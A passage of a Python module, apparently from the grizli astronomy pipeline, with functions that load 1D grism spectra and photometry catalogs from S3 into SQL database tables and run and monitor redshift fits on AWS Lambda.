    Convert 1D spectral data to lists suitable for putting into dataframes
    and sending to the databases.

    Returns an OrderedDict keyed by grism ('g102'/'g141'/'g800l') with the
    per-column list data, or False if the file is missing or contains no
    spectral extensions.
    """
    from collections import OrderedDict

    import astropy.io.fits as pyfits
    from .. import utils

    if not os.path.exists(file):
        print('Spectrum file not found')
        return False

    im = pyfits.open(file)
    obj_id = im[0].header['ID']
    obj_root = im[0].header['TARGET']

    # R30 products get their own table prefix and drop the model columns
    if '.R30.' in file:
        skip_columns = ['line', 'cont']
        pref = 'spec1d_r30'
    else:
        skip_columns = []
        pref = 'spec1d'

    spectra = OrderedDict()

    has_spectra = False
    for gr in ['G102', 'G141', 'G800L']:
        if gr in im:
            has_spectra = True
            sp = utils.GTable.read(file, hdu=gr)
            prefix = '{0}_{1}_'.format(pref, gr.lower())

            spd = {prefix+'id': obj_id, prefix+'root': obj_root}

            for c in sp.colnames:
                if c in skip_columns:
                    continue

                spd[prefix+c] = sp[c].tolist()

            spectra[gr.lower()] = spd

    if has_spectra:
        return spectra
    else:
        return False
def send_1D_to_database(files=[], engine=None):
    """
    Send a list of 1D spectra to the spectra databases

    ToDo: check for existing lines
    """
    from collections import OrderedDict
    import pandas as pd

    if engine is None:
        engine = get_db_engine()

    # Accumulate column lists over all input files, grouped by grism
    tables = OrderedDict()

    for file in files:
        sp_i = convert_1D_to_lists(file=file)
        print('Read spec1d file: {0}'.format(file))
        for gr in sp_i:
            # Initialize the columns
            if gr not in tables:
                tables[gr] = OrderedDict()
                for c in sp_i[gr]:
                    tables[gr][c] = []

            # Add the data
            for c in sp_i[gr]:
                tables[gr][c].append(sp_i[gr][c])

    prefix = 'spec1d_r30' if '.R30.' in files[0] else 'spec1d'

    for gr in tables:
        tablename = '{0}_{1}'.format(prefix, gr)

        df = pd.DataFrame(tables[gr])

        # Put wavelengths in their own tables to avoid massive duplication
        wave_table = tablename+'_wave'
        if wave_table not in engine.table_names():
            print('Create wave table: '+wave_table)

            wdf = pd.DataFrame(data=tables[gr][wave_table][0],
                               columns=[wave_table])
            wdf.to_sql(wave_table, engine, if_exists='replace',
                       index=True, index_label=tablename+'_idx')

        # drop wave from spectra tables
        df.drop('{0}_wave'.format(tablename), axis=1, inplace=True)

        # Create table, sizing the array columns from the first row
        if tablename not in engine.table_names():
            print('Initialize table {0}'.format(tablename))

            SQL = "CREATE TABLE {0} (\n".format(tablename)
            SQL += ' {0}_root text,\n'.format(tablename)
            SQL += ' {0}_id integer,\n'.format(tablename)
            for c in df.columns:
                item = df[c][0]
                if isinstance(item, list):
                    SQL += ' {0} real[{1}],\n'.format(c, len(item))

            # Trim the trailing ',\n' before closing the statement
            engine.execute(SQL[:-2]+')')

            try:
                engine.execute("CREATE INDEX {0}_idx ON {0} ({0}_root, {0}_id);".format(tablename))
            except:
                pass

        # Delete existing duplicates
        if tablename in engine.table_names():
            SQL = """DELETE from {0} WHERE """.format(tablename)
            mat = ["({0}_root = '{1}' AND {0}_id = {2})".format(tablename, r, i) for r, i in zip(df[tablename+'_root'], df[tablename+'_id'])]
            SQL += 'OR '.join(mat)

            rsp = engine.execute(SQL)

        # Send the table
        print('Send {0} rows to {1}'.format(len(df), tablename))
        df.to_sql(tablename, engine, index=False, if_exists='append',
                  method='multi')
def add_all_spectra():
    """
    Load 1D spectra into the spec1d tables for every root in `redshift_fit`,
    using a local 'log' file as a checkpoint of roots already handled.

    Fixes: the original read the module-level ``engine`` placeholder (None
    at import) and crashed with ``open('log')`` when the checkpoint file
    did not exist; file handles were also never closed.
    """
    from grizli.aws import db as grizli_db

    # Module-level `engine` is None at import; create a live one
    engine = get_db_engine(echo=False)

    roots = grizli_db.from_sql("select root,count(root) as n from redshift_fit group BY root order by n DESC", engine)

    o = 1

    for root in roots['root'][::o]:
        # Checkpoint file: one completed root per line
        if os.path.exists('log'):
            with open('log') as fp:
                existing = fp.readlines()
        else:
            existing = []

        if root + '\n' in existing:
            print('Skip', root)
            continue

        # Claim this root before starting so parallel runs skip it
        with open('log', 'a') as fp:
            fp.write(root + '\n')

        # Best-effort: move on to the next root on any failure
        try:
            grizli_db.add_oned_spectra(root=root, engine=engine)
        except:
            pass
def add_oned_spectra(root='j214224m4420gr01', bucket='grizli-v1', engine=None):
    """
    Sync all 1D/R30 spectra for `root` from S3, load them into the spec1d
    tables in batches of `nmax` files, then remove the local copies.
    """
    import os
    import glob
    from collections import OrderedDict

    if engine is None:
        engine = get_db_engine()

    # import boto3
    # s3 = boto3.resource('s3')
    # bkt = s3.Bucket(bucket)
    #
    # files = [obj.key for obj in bkt.objects.filter(Prefix='Pipeline/{0}/Extractions/'.format(root))]
    #
    # for file in files:
    #     if (('.R30.fits' in file) | ('.1D.fits' in file)) & (not os.path.exists(file)):
    #         local_file = os.path.basename(file)
    #         print(local_file)
    #         bkt.download_file(file, local_file,
    #                           ExtraArgs={"RequestPayer": "requester"})

    os.system('aws s3 sync s3://{0}/Pipeline/{1}/Extractions/ ./ --exclude "*" --include "*R30.fits" --include "*1D.fits"'.format(bucket, root))

    # Batch size keeps the generated INSERT statements manageable
    nmax = 500

    # 1D.fits
    files = glob.glob('{0}_*1D.fits'.format(root))
    files.sort()
    for i in range(len(files)//nmax+1):
        send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)

    files = glob.glob('{0}_*R30.fits'.format(root))
    files.sort()
    for i in range(len(files)//nmax+1):
        send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)

    os.system('rm {0}_*.1D.fits {0}_*.R30.fits'.format(root))
# --- Dead scratch block: `if False` never executes on import.  Interactive
# --- notes for stacking rest-frame-shifted 1D spectra from the spec1d
# --- tables; kept for reference.  Relies on module-level `pd`, `np`,
# --- `engine`, `OrderedDict` and an in-scope `root` when run by hand.
if False:
    import scipy.ndimage as nd
    import matplotlib.pyplot as plt

    tablename = 'spec1d_g141'
    #tablename = 'spec1d_g102'
    #tablename = 'spec1d_r30_g141'

    if 1:
        # by root
        resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND root = '{0}' AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
    else:
        # everything
        resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)

    # Halpha EW
    resp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, t_g141, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.3 AND err_ha > 0 ORDER BY ew50_ha".format(root, tablename), engine)

    # Everything
    fresp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, ew50_oiii, ew50_hb, ew50_oii, d4000, d4000_e, t_g141, t_g102, t_g800l, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 AND chinu < 2 ORDER BY z_map".format(root, tablename), engine)

    wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
                             engine)[tablename+'_wave'].values

    resp = fresp

    sort_column = 'z_map'
    bin_factor = 1

    # Normalization wavelength and the redshift that puts it mid-bandpass
    wnorm = 6400
    zref = 1.3e4/wnorm-1

    sel = np.isfinite(fresp[sort_column]) & (fresp[sort_column] != -99)
    norm_ix = np.interp(wnorm*(1+fresp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)
    sel &= np.isfinite(norm_ix)

    resp = fresp[sel]
    norm_ix = np.cast[int](np.round(np.interp(wnorm*(1+resp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)))

    resp.sort_values(sort_column, inplace=True)

    if tablename == 'spec1d_g141':
        exptime = resp['t_g141'].values
        wlim = [1.1e4, 1.65e4]
    else:
        exptime = resp['t_g102'].values
        wlim = [8000, 1.1e4, 1.65e4]

    # Unpack list-valued spectrum columns into 2D numpy arrays
    data = OrderedDict()
    for c in resp.columns:
        if c.startswith(tablename):
            c_i = c.split(tablename+'_')[1]
            try:
                data[c_i] = np.array(resp[c].values.tolist())
            except:
                pass

    #plt.imshow((data['flux'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)

    # Rest-frame
    dz = np.diff(wave)[10]/wave[10]
    max_zshift = np.cast[int](np.log(1+resp['z_map'].max())/dz)
    zshift = np.cast[int]((np.log(1+resp['z_map']) - np.log(1+zref))/dz)

    err_max = 5

    # Continuum normalized
    #norm = data['cont'][:,100]/data['flat'][:,100]
    norm = np.zeros(len(resp))
    for i, ix in enumerate(norm_ix):
        norm[i] = data['line'][i, ix]/data['flat'][i, ix]

    #norm = np.mean(data['cont'][:,50:120]/data['flat'][:,50:120], axis=1)

    # 2D arrays
    normed = ((data['flux']/data['flat']).T/norm).T
    cnormed = ((data['cont']/data['flat']).T/norm).T
    lnormed = (((data['line']-data['cont'])/data['flat']).T/norm).T
    err = ((data['err']/data['flat']).T/norm).T

    mask = np.isfinite(norm) & (norm > 0) & np.isfinite(norm_ix)

    normed = normed[mask, :]
    cnormed = cnormed[mask, :]
    lnormed = lnormed[mask, :]
    err = err[mask, :]
    ivar = 1/err**2
    ivar[err <= 0] = 0

    # Weight by exposure time
    ivar = (ivar.T*0+(exptime[mask]/4000.)*norm[mask]).T

    zshift = zshift[mask]

    # Clip edges
    wclip = (wave > wlim[0]) & (wave < wlim[1])
    mask_val = 1e10
    normed[:, ~wclip] = -mask_val
    cnormed[:, ~wclip] = -mask_val
    lnormed[:, ~wclip] = -mask_val

    # Pad arrays so every spectrum can be rolled to a common rest frame
    sh = normed.shape
    rest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
    crest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
    lrest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val

    rest[:, zshift.max():zshift.max()+sh[1]] = normed*1
    crest[:, zshift.max():zshift.max()+sh[1]] = cnormed*1
    lrest[:, zshift.max():zshift.max()+sh[1]] = lnormed*1

    rest_ivar = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min()))
    rest_ivar[:, zshift.max():zshift.max()+sh[1]] = ivar*1

    for i in range(sh[0]):
        rest[i, :] = np.roll(rest[i, :], -zshift[i])
        crest[i, :] = np.roll(crest[i, :], -zshift[i])
        lrest[i, :] = np.roll(lrest[i, :], -zshift[i])
        rest_ivar[i, :] = np.roll(rest_ivar[i, :], -zshift[i])

    ok = np.isfinite(rest) & np.isfinite(rest_ivar) & (rest > -0.8*mask_val)
    rest_ivar[~ok] = 0
    rest[~ok] = -mask_val
    crest[~ok] = -mask_val
    lrest[~ok] = -mask_val

    # Inverse-variance-weighted binning down the object axis
    shr = rest.shape
    nbin = int((shr[0]//shr[1])//2*bin_factor)*2
    kernel = np.ones((1, nbin)).T

    # npix = np.maximum(nd.convolve((rest > -0.8*mask_val)*1, kernel), 1)
    # srest = nd.convolve(rest*(rest > -0.8*mask_val), kernel)
    # sbin = (srest/npix)[::nbin,:]
    # plt.imshow(sbin, vmin=0, vmax=5)

    num = nd.convolve(rest*rest_ivar, kernel)
    cnum = nd.convolve(crest*rest_ivar, kernel)
    lnum = nd.convolve(lrest*rest_ivar, kernel)
    den = nd.convolve(rest_ivar, kernel)
    wbin = (num/den)[::nbin, :]
    wbin[~np.isfinite(wbin)] = 0
    cwbin = (cnum/den)[::nbin, :]
    cwbin[~np.isfinite(cwbin)] = 0
    lwbin = (lnum/den)[::nbin, :]
    lwbin[~np.isfinite(lwbin)] = 0

    plt.imshow(wbin, vmin=0, vmax=5)

    plt.imshow((data['line'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
def run_lambda_fits(root='j004404m2034', phot_root=None, mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None, zr=[0.01, 3.4], bucket='grizli-v1', verbose=True, extra={'bad_pa_threshold': 10}, ids=None):
    """
    Run redshift fits on AWS lambda for a given field `root`.

    Selects objects from the ``{phot_root}_phot_apcorr.fits`` catalog that
    fall within the grism exposure footprints and satisfy magnitude / S/N
    cuts, submits them to the lambda fitter, and waits for the database
    to be updated.

    Parameters
    ----------
    root : str
        Field root name of the grism extractions.

    phot_root : str, None
        Root of the photometric catalog; defaults to `root` if None.

    mag_limits : [float, float]
        Magnitude selection range.

    sn_limit : float
        Minimum S/N in the selection band.

    min_status : int, None
        If set, only (re)fit objects with ``status < min_status`` in the
        `redshift_fit` table.  Values > 1000 switch to selecting objects
        with ``status = min_status/1000`` (``/10000`` additionally applies
        the magnitude limits).

    engine : sqlalchemy engine, None
        Database connection, created with `get_db_engine` if None.

    zr : [float, float]
        Redshift fitting range.

    bucket : str
        S3 bucket with the pipeline products.

    verbose : bool
        Passed through to the lambda fitter.

    extra : dict
        Extra keyword arguments for `fit_redshift_lambda.fit_lambda`.

    ids : list, None
        Explicit list of object IDs to fit, bypassing the catalog
        selection.

    Returns
    -------
    res : `pandas.DataFrame` or bool
        Fit summary joined with the photometry, or False if no objects
        were selected.
    """
    from grizli.aws import fit_redshift_lambda
    from grizli import utils
    from grizli.aws import db as grizli_db

    if engine is None:
        engine = grizli_db.get_db_engine()

    import pandas as pd
    import numpy as np
    import glob
    import os

    print('Sync phot catalog')

    if phot_root is None:
        # Bugfix: was `root = root`, a no-op that left phot_root = None
        # and broke the format strings / read_catalog call below
        phot_root = root

    os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits"'.format(phot_root, bucket))

    print('Sync wcs.fits')
    os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits" --include "*wcs.fits"'.format(root, bucket))

    phot = utils.read_catalog('{0}_phot_apcorr.fits'.format(phot_root))

    # Flag objects covered by at least one grism exposure footprint
    phot['has_grism'] = 0
    wcs_files = glob.glob('*wcs.fits')
    for f in wcs_files:
        w = utils.WCSFootprint(f, ext=0)
        has = w.path.contains_points(np.array([phot['ra'], phot['dec']]).T)
        print(f, has.sum())
        phot['has_grism'] += has

    # Magnitude / S/N from the reddest available band for each object
    mag = phot['mag_auto']*np.nan
    # NOTE(review): '<U1' dtype truncates the filter names stored here to
    # one character; the array is informational only and never read back
    mag_filt = np.array([' ']*len(phot))
    sn = phot['mag_auto']*np.nan

    for filt in ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f814w', 'f850lp', 'f606w', 'f775w']:
        if '{0}_tot_1'.format(filt) in phot.colnames:
            mag_i = 23.9-2.5*np.log10(phot['{0}_tot_1'.format(filt)])
            fill = (~np.isfinite(mag)) & np.isfinite(mag_i)
            mag[fill] = mag_i[fill]
            mag_filt[fill] = filt

            sn_i = phot['{0}_tot_1'.format(filt)]/phot['{0}_etot_1'.format(filt)]
            sn[fill] = sn_i[fill]

    sel = np.isfinite(mag) & (mag >= mag_limits[0]) & (mag <= mag_limits[1]) & (phot['has_grism'] > 0)
    sel &= phot['flux_radius'] > 1
    sel &= sn > sn_limit

    if min_status is not None:
        # Only keep objects that haven't already reached `min_status`
        res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}'".format(root), engine)
        if len(res) > 0:
            status = phot['id']*0-100
            status[res['id']-1] = res['status']
            sel &= status < min_status

    if ids is None:
        ids = phot['id'][sel]

        # Select just on min_status
        # (guarded: `None > 1000` raises TypeError on Python 3)
        if (min_status is not None) and (min_status > 1000):
            if min_status > 10000:
                # Include mag constraints
                res = pd.read_sql_query("SELECT root, id, status, mtime, mag_auto FROM redshift_fit,photometry_apcorr WHERE root = '{0}' AND status = {1}/10000 AND mag_auto > {2} AND mag_auto < {3} AND p_root = root AND p_id = id".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
            else:
                # just select on status
                res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}' AND status = {1}/1000".format(root, min_status, mag_limits[0], mag_limits[1]), engine)

            ids = res['id'].tolist()

    if len(ids) == 0:
        return False

    # Submit the fits to AWS lambda
    fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name=bucket, skip_existing=False, sleep=False, skip_started=False, show_event=False, zr=zr, force_args=True, quasar_fit=False, output_path=None, save_figures='png', verbose=verbose, **extra)

    print('Add photometry: {0}'.format(root))
    grizli_db.add_phot_to_db(phot_root, delete=False, engine=engine)

    # Wait for the lambda fits to finish populating the database
    res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
    grizli_db.set_phot_root(root, phot_root, engine)

    res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0 AND root = '{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
    return res

    # ---- Unreachable developer scratch (after `return`) ----
    if False:
        res = pd.read_sql_query("SELECT root, id, status, redshift, bic_diff, mtime FROM redshift_fit WHERE (root = '{0}')".format(root), engine)

        # Get arguments
        args = fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 3.4], force_args=True)
def set_phot_root(root, phot_root, engine):
    """
    Set the `phot_root` column of the `redshift_fit` table for all rows
    with a given `root`, pointing them at the photometric catalog to use.
    """
    print(f'Set phot_root = {root} > {phot_root}')

    SQL = f"""UPDATE redshift_fit
    SET phot_root = '{phot_root}'
    WHERE (root = '{root}');
    """

    engine.execute(SQL)

    if False:
        # Developer scratch (never executed)

        # Check where phot_root not equal to root
        res = pd.read_sql_query("SELECT root, id, status, phot_root FROM redshift_fit WHERE (phot_root != root)".format(root), engine)

        # update the one pointing where it should change in photometry_apcorr
        engine.execute("UPDATE photometry_apcorr SET p_root = 'j214224m4420' WHERE root = 'j214224m4420gr01';")
        engine.execute("UPDATE redshift_fit SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
        engine.execute("UPDATE redshift_fit_quasar SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")

    if False:
        # Replace in-place
        from grizli.aws import db as grizli_db
        # NOTE(review): the first statement below is missing the closing
        # quote on the LIKE pattern — broken SQL, but unreachable
        engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%' AND root LIKE '%%-grism%%")
        engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%'")
        engine.execute("update redshift_fit set phot_root = 'j214224m4420' WHERE root like 'j214224m4420gr%%'")
        engine.execute("update redshift_fit_quasar set phot_root = replace(root, 'g800l', 'grism') where root like '%%g800l%%'")

        # Set 3D-HST fields
        res = grizli_db.from_sql("select distinct root from redshift_fit where root like '%%-grism%%'", engine)
        for root in res['root']:
            grizli_db.set_phot_root(root, root, engine)
            grizli_db.set_phot_root(root.replace('-grism', '-g800l'), root, engine)
            xres = grizli_db.from_sql("select root, count(root) from redshift_fit where root like '{0}-%%' group by root".format(root.split('-')[0]), engine)
            print(xres)

        # Update OBJID for natural join
        # for tab in ['redshift_fit', 'redshift_fit_quasar', 'multibeam']
        SQL = """
        WITH sub AS (
            SELECT objid as p_objid, p_root, p_id
            FROM photometry_apcorr
        )
        UPDATE redshift_fit
        SET objid = p_objid
        FROM sub
        WHERE phot_root = p_root AND id = p_id;
        """
        grizli_db.from_sql(SQL, engine)
        engine.execute(SQL)
def wait_on_db_update(root, t0=60, dt=30, n_iter=60, engine=None):
    """
    Poll the `redshift_fit` table until the rows for `root` stop changing.

    Each iteration queries the row count, the number of rows with
    status 5 and 6, and a status checksum.  Polling stops when the
    count, checksum and status-6 count are all unchanged between two
    consecutive queries, or after `n_iter` iterations.  Sleeps `t0`
    seconds after the first query and `dt` seconds between subsequent
    queries.

    Returns the last query result as a `pandas.DataFrame`.
    """
    import pandas as pd
    from astropy.table import Table
    from grizli.aws import db as grizli_db
    import numpy as np
    import time

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    prev_count, prev_n6, prev_checksum = -1, -1, -1

    query = "SELECT root, id, status FROM redshift_fit WHERE root = '{0}'"
    for iteration in range(n_iter):
        res = pd.read_sql_query(query.format(root), engine)

        checksum = (2**res['status']).sum()
        count = len(res)
        n6 = (res['status'] == 6).sum()
        n5 = (res['status'] == 5).sum()

        unchanged = ((count == prev_count) and
                     (checksum == prev_checksum) and
                     (n6 == prev_n6))
        if unchanged:
            break

        now = utils.nowtime()
        print('{0}, {1}: n={2:<5d} n5={5:<5d} n6={3:<5d} checksum={4}'.format(root, now, count, n6, checksum, n5))

        prev_count, prev_n6, prev_checksum = count, n6, checksum

        # Longer wait before the first re-check
        time.sleep(t0 if iteration == 0 else dt)

    return res
##
def fit_timeouts(root='j004404m2034', mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None):
    """
    Run redshift fits on lambda for a given root

    Resubmits objects whose previous fit timed out (``status = 5`` in
    the `redshift_fit` table) and waits for the database to be updated.

    Returns True if there was nothing to resubmit, otherwise the result
    of `wait_on_db_update`.
    """
    from grizli.aws import fit_redshift_lambda
    from grizli import utils
    from grizli.aws import db as grizli_db
    if engine is None:
        engine = grizli_db.get_db_engine()

    import pandas as pd
    import numpy as np
    import glob
    import os

    # Objects flagged as timed-out (status = 5) for this root
    res = pd.read_sql_query("SELECT id, status FROM redshift_fit WHERE root = '{0}' AND status = 5".format(root), engine)
    if len(res) == 0:
        return True

    ids = res['id'].tolist()

    fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=False, zr=[0.01, 2.4], force_args=True)

    res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
    return res

    # ---- Unreachable developer scratch below (after `return`) ----

    # All timeouts
    events = fit_redshift_lambda.fit_lambda(root='egs-g800l-j141956p5255', beams=[], ids=[20667], newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 2.4], force_args=True)

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' ORDER BY root".format(root), engine)

    base = {'bucket': 'grizli-v1', 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,2.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png'}
    all_events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=True)

    #################
    # Fit locally on EC2
    i0 = 0

    import os
    import pandas as pd
    import numpy as np
    from grizli.aws import db as grizli_db
    from grizli.aws import fit_redshift_lambda, lambda_handler
    engine = grizli_db.get_db_engine(echo=False)

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root LIKE '%%-grism%%' ORDER BY root", engine)
    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root NOT LIKE '%%-grism%%' AND root NOT LIKE '%%g800l%%' ORDER BY root", engine)
    bucket = 'grizli-v1'

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'j114936p2222' ORDER BY id", engine)
    bucket = 'grizli-v1'

    # res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'cos-grism%%' order by id", engine)
    # bucket = 'grizli-cosmos-v2'

    N = len(res)
    np.random.seed(1)
    so = np.argsort(np.random.normal(size=N))

    base = {'bucket': bucket, 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,3.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png', 'verbose': True, 'working_directory': os.getcwd()}
    events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=False)

    for event in events[i0::2]:
        lambda_handler.handler(event, {})

    ########
    xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
    print(len(res), len(xres))

    # show points
    xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
# Photometry table
def set_filter_bits(phot):
    """
    Set bits indicating available filters

    Adds two ``uint32`` columns to `phot`:

    - ``filter_bit``: bitwise OR of ``2**i`` for every filter ``i`` with a
      finite ``{filt}_flux_aper_0`` measurement.
    - ``red_bit``: the bit of the *reddest* available filter only (the
      first filter in the list below that has a finite flux).
    """
    import numpy as np

    filters = ['f160w', 'f140w', 'f125w', 'f110w', 'f105w', 'f098m',
               'f850lp', 'f814w', 'f775w', 'f625w', 'f606w', 'f475w',
               'f438w', 'f435w', 'f555w', 'f350lp', 'f390w', 'f336w',
               'f275w', 'f225w']

    nrows = len(phot)
    phot['filter_bit'] = np.zeros(nrows, dtype=np.uint32)
    phot['red_bit'] = np.zeros(nrows, dtype=np.uint32)

    for idx, filt in enumerate(filters):
        col = '{0}_flux_aper_0'.format(filt)
        if col not in phot.colnames:
            continue

        bit = np.uint32(2**idx)
        detected = np.isfinite(phot[col])

        # Reddest-filter bit: only where no redder filter was already set
        red = bit * detected * (phot['filter_bit'] == 0)
        phot['filter_bit'] |= bit * detected
        phot['red_bit'] |= red
        print(filt, idx, bit, red.max())
def phot_to_dataframe(phot, root):
    """
    Convert a ``{root}_phot_apcorr.fits`` table to a `pandas.DataFrame`.

    - Adds a 'root' column and the available-filter bit flags
    - Removes the placeholder "dummy" columns
    - Prefixes the bounding-box columns ('xmin', 'xmax', 'ymin', 'ymax')
      with 'image_' and the key columns ('root', 'id', 'ra', 'dec')
      with 'p_'
    """
    phot['root'] = root

    set_filter_bits(phot)

    for dummy_col in ('dummy_flux', 'dummy_err'):
        if dummy_col in phot.colnames:
            phot.remove_column(dummy_col)

    for box_col in ('xmin', 'xmax', 'ymin', 'ymax'):
        phot.rename_column(box_col, 'image_' + box_col)

    for key_col in ('root', 'id', 'ra', 'dec'):
        phot.rename_column(key_col, 'p_' + key_col)

    return phot.to_pandas()
def add_phot_to_db(root, delete=False, engine=None, nmax=500):
    """
    Read the table {root}_phot_apcorr.fits and append it to the grizli_db `photometry_apcorr` table

    Parameters
    ----------
    root : str
        Field root; reads the local file ``{root}_phot_apcorr.fits``.

    delete : bool
        If rows for `root` already exist, delete them first.  If False
        and rows exist, do nothing and return False.

    engine : sqlalchemy engine
        Database connection, created if None.

    nmax : int
        If > 0, upload the table in chunks of `nmax` rows.
    """
    import pandas as pd
    from astropy.table import Table
    from grizli.aws import db as grizli_db
    import numpy as np

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Is this root already in the database?
    res = pd.read_sql_query("SELECT p_root, p_id FROM photometry_apcorr WHERE p_root = '{0}'".format(root), engine)
    if len(res) > 0:
        if delete:
            print('Delete rows where root={0}'.format(root))
            res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root))

            if False:
                # scratch: optionally also clear the fits (never executed)
                res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root))
        else:
            print('Data found for root={0}, delete them if necessary'.format(root))
            return False

    # Read the catalog
    phot = Table.read('{0}_phot_apcorr.fits'.format(root), character_as_bytes=False)

    # remove columns
    remove = []
    for c in phot.colnames:
        if ('_corr_' in c) | ('_ecorr_' in c) | (c[-5:] in ['tot_4', 'tot_5', 'tot_6']) | ('dummy' in c):
            remove.append(c)

    phot.remove_columns(remove)

    # Add new filter columns if necessary
    # (empty SELECT just fetches the current table schema)
    empty = pd.read_sql_query("SELECT * FROM photometry_apcorr WHERE false", engine)

    df = phot_to_dataframe(phot, root)
    new_cols = []
    for c in df.columns:
        if c not in empty.columns:
            new_cols.append(c)

    if len(new_cols) > 0:
        for c in new_cols:
            print('Add column {0} to `photometry_apcorr` table'.format(c))
            sql = "ALTER TABLE photometry_apcorr ADD COLUMN {0} real;".format(c)
            res = engine.execute(sql)

    # Add new table
    print('Send {0}_phot_apcorr.fits to `photometry_apcorr`.'.format(root))
    if nmax > 0:
        # Split the upload into chunks of nmax rows
        N = len(phot) // nmax
        for i in range(N+1):
            print('   add rows {0:>5}-{1:>5} ({2}/{3})'.format(i*nmax, (i+1)*nmax, i+1, N+1))
            df[i*nmax:(i+1)*nmax].to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
    else:
        # Single upload
        df.to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
def multibeam_to_database(beams_file, engine=None, Rspline=15, force=False, **kwargs):
    """
    Send statistics of the beams.fits file to the database

    Computes a spline-continuum fit and percentiles of the masked
    science / error / contamination arrays of a `MultiBeam` object and
    inserts one row per object into the `multibeam` table plus one row
    per beam into `beam_geometry`.

    Parameters
    ----------
    beams_file : str
        Filename like ``{root}_{id:05d}.beams.fits``.

    engine : sqlalchemy engine, None
        Database connection, created with `get_db_engine` if None.

    Rspline : int
        Resolution of the spline templates used for the continuum fit.

    force : bool
        Re-ingest even if a row with the same file `mtime` already
        exists in the `multibeam` table.

    kwargs : dict
        Passed to `multifit.MultiBeam`.
    """
    import numpy as np
    import pandas as pd
    from astropy.time import Time

    from .. import multifit, utils

    if engine is None:
        engine = get_db_engine(echo=False)

    # File modification time identifies the version already ingested
